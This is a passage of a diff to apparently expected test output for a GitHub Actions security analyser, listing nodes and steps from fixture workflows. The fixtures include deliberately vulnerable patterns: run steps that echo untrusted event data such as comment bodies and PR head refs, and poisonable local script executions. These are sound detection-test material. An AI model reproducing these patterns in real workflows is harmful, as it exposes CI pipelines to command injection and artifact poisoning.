scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ 
steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -129,14 +130,17 @@ runExprs | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | uses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | stepUses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesArgs +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | runStepChildren | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | 
@@ -171,23 +175,23 @@ runStepChildren | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | 
.github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| 
.github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -340,86 +344,94 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| 
.github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| 
.github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| 
.github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| 
.github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await 
import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
